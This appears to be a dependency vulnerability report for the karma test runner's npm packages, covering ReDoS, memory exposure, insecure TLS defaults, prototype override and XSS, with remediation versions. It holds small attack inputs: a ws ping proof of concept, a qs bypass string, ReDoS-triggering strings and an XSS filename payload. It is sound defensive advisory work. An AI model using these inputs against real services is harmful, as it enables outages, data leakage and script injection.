  • Introduced through: karma@1.4.1 > socket.io@1.7.2 > socket.io-client@1.7.2 > engine.io-client@1.8.2 > ws@1.1.1

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package use the cryptographically insecure Math.random(), which can produce predictable values and should not be used in a security-sensitive context.

Details

Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated.

There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value. In general, if a PRNG algorithm is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts.

You can read more about node's insecure Math.random() in Mike Malone's post.
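
For contrast, a short sketch of statistical versus cryptographic randomness in Node.js (a generic illustration, not ws's internal code):

var crypto = require('crypto');

// Insecure: Math.random() is a statistical PRNG; its output is predictable
// and must not be used for security-sensitive values such as keys or tokens.
var weak = Math.floor(Math.random() * 0xffffffff);

// Secure: crypto.randomBytes() returns cryptographically strong random bytes.
var strong = crypto.randomBytes(4).readUInt32BE(0);

console.log({ weak: weak, strong: strong });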

Remediation

Upgrade ws to version 1.1.2 or higher.

References

Fixed in 1.4.0

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > engine.io@1.6.10 > accepts@1.1.4 > negotiator@0.4.9

Overview

negotiator is an HTTP content negotiator for Node.js. Versions prior to 0.6.1 are vulnerable to a Regular expression Denial of Service (ReDoS) attack when parsing the "Accept-Language" HTTP header.

An attacker can provide a long value in the Accept-Language header, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the thread and preventing it from processing other requests. By repeatedly sending multiple such requests, the attacker can make the server unavailable (a Denial of Service attack).
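
A hedged sketch showing how the attacker-controlled header reaches negotiator in a typical server; the port and language list are placeholders:

var http = require('http');
var Negotiator = require('negotiator');

http.createServer(function (req, res) {
  // The Accept-Language header is fully attacker-controlled; in affected
  // versions a long, near-matching value makes this parsing step very slow.
  var negotiator = new Negotiator(req);
  var language = negotiator.language(['en', 'fr', 'de']);
  res.end('negotiated language: ' + language);
}).listen(3000);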

Details

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and hang for a very long time. [1]

Remediation

Upgrade negotiator to version 0.6.1 or greater.

References

Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: socket.io@1.3.0 > engine.io@1.5.0 > ws@0.5.0
  • Introduced through: socket.io@1.3.0 > socket.io-client@1.3.0 > engine.io-client@1.5.0 > ws@0.4.31
  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > engine.io@1.6.10 > ws@1.0.1
  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > socket.io-client@1.4.6 > engine.io-client@1.6.9 > ws@1.0.1

Overview

ws is a WebSocket client and server implementation.

By default, affected versions of this package did not limit the size of an incoming payload before processing it. As a result, a very large payload (over 256MB in size) could lead to a failed allocation and crash the node process, enabling a Denial of Service attack.

While 256MB may seem excessive, note that the attack is likely to be sent from another server, not an end-user computer, using data-center connection speeds. At those speeds, a payload of this size can be transmitted in seconds.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Update to version 1.1.1 or greater, which sets a default maxPayload of 100MB. If you cannot upgrade, apply a Snyk patch, or provide ws with options setting the maxPayload to an appropriate size that is smaller than 256MB.
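
A minimal sketch of the mitigation for versions that support the maxPayload option; the 1MB limit is an arbitrary example, not a recommended value:

var WebSocket = require('ws');

// Cap incoming payloads well below the ~256MB allocation-failure threshold.
var wss = new WebSocket.Server({
  port: 8080,
  maxPayload: 1024 * 1024 // 1MB; adjust to your largest legitimate message
});

wss.on('connection', function (socket) {
  socket.on('message', function (data) {
    // oversized frames are rejected before reaching this handler
  });
});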

References

Fixed in 0.13.12

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.11 > minimatch@2.0.10

Overview

minimatch is a minimalistic matching library used for converting glob expressions into JavaScript RegExp objects. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many Regular Expression implementations may reach edge cases that cause them to work very slowly (exponentially related to input size). An attacker can exploit this by supplying a specially crafted input that pushes the program into these extreme situations, causing the service to excessively consume CPU and resulting in a Denial of Service.

An attacker can provide a long value to the minimatch function, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the event loop and preventing it from processing other requests and making the server unavailable (a Denial of Service attack).

You can read more about Regular Expression Denial of Service (ReDoS) on our blog.

Remediation

Upgrade minimatch to version 3.0.2 or greater.

References

Fixed in 0.13.10

Regular Expression Denial of Service (DoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > debug@2.1.0 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > engine.io@1.5.4 > debug@1.0.3 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4 > debug@1.0.4 > ms@0.6.2
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-adapter@0.3.1 > debug@1.0.2 > ms@0.6.2

Overview

ms is a tiny millisecond conversion utility.

Affected versions of this package are vulnerable to a Regular expression Denial of Service (ReDoS) attack when converting a time period string (e.g. "2 days", "1h") into a milliseconds integer. A malicious user could pass extremely long strings to ms(), causing the server to take a long time to process them and blocking the event loop for that extended period.
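
A hedged sketch of the call shape; the long numeric prefix illustrates the kind of input that blocks the event loop and is not the exact reported payload:

var ms = require('ms');

// Normal use: convert a human-readable time span to milliseconds.
console.log(ms('2 days')); // 172800000

// Illustrative oversized input.
var payload = '1'.repeat(100000) + ' days';
console.time('ms');
ms(payload);
console.timeEnd('ms');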

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's    Number of steps
ACCCX               3                38
ACCCCX              4                71
ACCCCCX             5                136
ACCCCCCCCCCCCCCX    14               65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations cause the engine to work very slowly (exponentially related to input size, as shown above), so an attacker can exploit this to make the service excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ms to version 0.7.1 or higher.

If a direct dependency upgrade is not possible, use snyk wizard to patch this vulnerability.

References

Remote Memory Exposure

medium severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > engine.io@1.5.4 > ws@0.8.0
  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4 > ws@0.8.0

Overview

ws is a simple to use websocket client, server and console for node.js. Affected versions of the package are vulnerable to Uninitialized Memory Exposure.

A client-side memory disclosure vulnerability exists in the ping functionality of the ws service. When a client sends a ping request and provides an integer value as ping data, it will result in leaking an uninitialized memory buffer.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

ws's ping function uses the default Buffer constructor as-is, making it easy to append uninitialized memory to an existing list. If the value of the buffer list is exposed to users, it may expose raw memory, potentially holding secrets, private data and code.

Proof of Concept:

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this makes the client allocate an uninitialized buffer of 50 bytes and send it to the server

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data)
  })
})

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value they received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.
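
For reference, Node.js (4.5 and later) provides allocation APIs that avoid this pitfall; a short sketch:

// Safer alternatives to the number constructor:
const safeZeroed = Buffer.alloc(10);        // zero-filled buffer of length 10
const fromString = Buffer.from('test');     // ASCII bytes [74, 65, 73, 74]
const fromArray  = Buffer.from([1, 2, 3]);  // bytes [01, 02, 03]

// If a length ever comes from user input, validate that it is a number within
// sane bounds before allocating, and never pass it to new Buffer(...).
console.log(safeZeroed, fromString, fromArray);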

Similar vulnerabilities were discovered in request, mongoose, ws and sequelize.

References

Insecure Defaults

high severity

Detailed paths

  • Introduced through: karma@0.13.9 > socket.io@1.3.7 > socket.io-client@1.3.7 > engine.io-client@1.5.4

Overview

engine.io-client, the client for engine.io and socket.io, disables the core SSL/TLS verification checks by default.

This allows an active attacker, for instance one operating a malicious WiFi, to intercept these encrypted connections using the attacker's spoofed certificate and keys. Doing so compromises the data communicated over this channel, as well as allowing an attacker to impersonate both the server and the client during the live session, sending spoofed data to either side.
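
A hedged sketch of explicitly re-enabling certificate verification when connecting over TLS; whether this option is honored depends on the engine.io-client version in use, so upgrading remains the real fix. The URL is a placeholder:

var io = require('socket.io-client');

var socket = io('https://example.com', {
  secure: true,
  rejectUnauthorized: true // do not accept spoofed certificates
});

socket.on('connect', function () {
  console.log('connected with TLS verification enabled');
});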

Remediation

Update to version 1.6.9 or greater.

If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.

References

Fixed in 0.13.0-rc.9

Uninitialized Memory Exposure

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.8 > http-proxy@0.10.4 > utile@0.2.1

Overview

utile is a drop-in replacement for util with some additional advantageous functions.

Affected versions of this package are vulnerable to Uninitialized Memory Exposure. A malicious user could extract sensitive data from uninitialized memory or cause a DoS by passing in a large number, in setups where typed user input can be passed.

Note: Uninitialized Memory Exposure impacts only Node.js 6.x or lower; Denial of Service impacts any Node.js version.

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value they received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.

Remediation

There is no fix version for utile.

References

Fixed in 0.13.0-rc.4

Prototype Override Protection Bypass

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > body-parser@1.13.3 > qs@4.0.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > qs@4.0.0

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

By default qs protects against attacks that attempt to overwrite an object's existing prototype properties, such as toString(), hasOwnProperty(), etc.

From qs documentation:

By default parameters that would overwrite properties on the object prototype are ignored, if you wish to keep the data from those fields either use plainObjects as mentioned above, or set allowPrototypes to true which will allow user input to overwrite those properties. WARNING It is generally a bad idea to enable this option as it can cause problems when attempting to use the properties that have been overwritten. Always be careful with this option.

Overwriting these properties can impact application logic, potentially allowing attackers to work around security controls, modify data, make the application unstable and more.

In versions of the package affected by this vulnerability, it is possible to circumvent this protection and overwrite prototype properties and functions by prefixing the name of the parameter with [ or ]. For example, qs.parse("]=toString") will return {toString = true}; as a result, calling toString() on the object will throw an exception.

Example:

qs.parse('toString=foo', { allowPrototypes: false })
// {}

qs.parse("]=toString", { allowPrototypes: false })
// {toString = true} <== prototype overwritten

For more information, you can check out our blog.

Disclosure Timeline

  • February 13th, 2017 - Reported the issue to package owner.
  • February 13th, 2017 - Issue acknowledged by package owner.
  • February 16th, 2017 - Partial fix released in versions 6.0.3, 6.1.1, 6.2.2, 6.3.1.
  • March 6th, 2017 - Final fix released in versions 6.4.0, 6.3.2, 6.2.3, 6.1.2 and 6.0.4.

Remediation

Upgrade qs to version 6.4.0 or higher. Note: The fix was backported to the following versions 6.3.2, 6.2.3, 6.1.2, 6.0.4.

References

Uninitialized Memory Exposure

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > express-session@1.11.3 > uid-safe@2.0.0 > base64-url@1.2.1

Overview

base64-url provides Base64 encode, decode, escape and unescape for URL applications.

Affected versions of this package are vulnerable to Uninitialized Memory Exposure. An attacker may extract sensitive data from uninitialized memory or may cause a DoS by passing in a large number, in setups where typed user input can be passed (e.g. from JSON).
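
A hedged illustration of the issue (assumed call shape, not taken from the advisory): if typed input such as a JSON number reaches the encoder, affected versions hand it to the unsafe Buffer constructor:

var base64url = require('base64-url');

// Normal use: encode a string.
console.log(base64url.encode('hello world'));

// Illustrative issue: an attacker sends {"data": 100} instead of a string,
// and the number 100 reaches the library, allocating uninitialized bytes.
var userInput = 100;
console.log(base64url.encode(userInput));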

Details

The Buffer class on Node.js is a mutable array of binary data, and can be initialized with a string, array or number.

const buf1 = new Buffer([1,2,3]);
// creates a buffer containing [01, 02, 03]
const buf2 = new Buffer('test');
// creates a buffer containing ASCII bytes [74, 65, 73, 74]
const buf3 = new Buffer(10);
// creates a buffer of length 10

The first two variants simply create a binary representation of the value they received. The last one, however, pre-allocates a buffer of the specified size, making it a useful buffer, especially when reading data from a stream. When using the number constructor of Buffer, it will allocate the memory, but will not fill it with zeros. Instead, the allocated buffer will hold whatever was in memory at the time. If the buffer is not zeroed by using buf.fill(0), it may leak sensitive information like keys, source code, and system info.

Remediation

Upgrade base64-url to version 2.0.0 or higher. Note: this is vulnerable only for Node <= 4.

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > fresh@0.3.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-favicon@2.3.2 > fresh@0.3.0
  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-static@1.10.3 > send@0.13.2 > fresh@0.3.0

Overview

fresh is a package for HTTP response freshness testing.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. A regular expression (/ *, */) was used for parsing HTTP headers and can take about 2 seconds of matching time for 50k characters.
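
A hedged sketch of a typical call and an illustrative header shape; the exact worst-case input is not reproduced from the advisory:

var fresh = require('fresh');

// Typical use in an HTTP handler: decide whether a 304 can be returned.
var reqHeaders = { 'if-none-match': '"abc123"' };
var resHeaders = { etag: '"abc123"' };
console.log(fresh(reqHeaders, resHeaders)); // true

// Illustrative oversized header value that keeps the / *, */ pattern busy.
var hostile = { 'if-none-match': ' '.repeat(50000) + ',"abc123"' };
fresh(hostile, resHeaders);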

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Upgrade fresh to version 0.5.2 or higher.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.3 > connect@2.30.2 > serve-static@1.10.3 > send@0.13.2 > mime@1.3.4

Overview

mime is a comprehensive, compact MIME type module.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It uses the regex /.*[\.\/\\]/ in its lookup, which can cause a slowdown of about 2 seconds for a 50,000-character input.
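
A minimal sketch of the slowdown, timing the pattern itself rather than going through mime's API; a long input with no dot, slash or backslash is the worst case:

const crafted = 'a'.repeat(50000);   // no '.', '/' or '\' anywhere in the string

console.time('lookup-regex');
/.*[\.\/\\]/.test(crafted);          // backtracks from every position before failing
console.timeEnd('lookup-regex');     // roughly the 2-second slowdown described above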

Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many regular expression implementations can reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can exploit this by supplying specially crafted input that pushes the program into such a situation, causing the service to consume CPU excessively and resulting in a Denial of Service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Upgrade mime to versions 1.4.1, 2.0.3 or higher.

References

Fixed in 0.13.0-rc.2

Information Exposure

low severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-static@1.6.5

Overview

serve-static is a Node.js middleware for serving static files, available through the npm registry.

Affected versions of this package are vulnerable to Information Exposure. The root path would be exposed via the express.static, res.sendfile, and res.sendFile methods.

Remediation

Upgrade serve-static to version 1.8.1 or higher.

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > useragent@2.0.10

Overview

useragent allows you to parse user agent strings with high accuracy by using hand-tuned, dedicated regular expressions for browser matching.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. A malicious user could block the server by sending requests whose headers contain an arbitrarily long user agent string.
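
A minimal sketch of the attack surface, assuming a vulnerable 2.0.x install. The payload below is only a hypothetical illustration of an over-long User-Agent value; the exact worst-case string depends on the affected regexes:

const useragent = require('useragent');    // assuming a vulnerable 2.0.x install

// hypothetical attacker-controlled User-Agent header of arbitrary length
const crafted = 'Mozilla/5.0 ' + 'a'.repeat(100000);

console.time('parse');
useragent.parse(crafted);                  // parsing runs synchronously on the event loop
console.timeEnd('parse');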

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see whether the string is valid. These extreme situations cause the regex engine to work very slowly (exponentially related to input size, as shown above). An attacker who can supply such input can therefore make the service consume CPU excessively, resulting in a Denial of Service.

Remediation

Update useragent to version 2.1.12 or higher.

References

Cross-site Scripting due to improper file and directory names escaping

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > connect@2.26.6 > serve-index@1.2.1

Overview

serve-index serves pages that contain directory listings for a given path.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) attacks. When using the serve-index middleware, file and directory names are not escaped in HTML output. If a remote attacker can influence these names, this may enable a persistent XSS attack.
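
A minimal sketch of the scenario, assuming the attacker can already create files in the listed directory (for example via an upload feature) and a vulnerable serve-index version; the server setup and paths are illustrative only:

const express = require('express');            // any connect-compatible server works
const serveIndex = require('serve-index');     // assuming a vulnerable version
const fs = require('fs');

// a file whose *name* carries the payload; assumes an uploads/ directory exists
fs.writeFileSync('uploads/<img src=x onerror=alert(document.cookie)>.txt', '');

const app = express();
app.use('/uploads', serveIndex('uploads'));    // the listing page echoes the name into HTML
app.listen(3000);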

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the client side, unbeknownst to the victim. This occurs when characters like < > " ' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an attack in which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an attack that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Remediation

Upgrade serve-index to version 1.6.3 or greater.

References

Regular Expression Denial of Service (ReDoS)

medium severity

Detailed paths

  • Introduced through: karma@0.13.0-rc.1 > useragent@2.0.10

Overview

useragent is a user agent string parser that uses Browserscope's research for parsing.

Affected versions of the package are vulnerable to Regular Expression Denial of Service (ReDoS).

Details

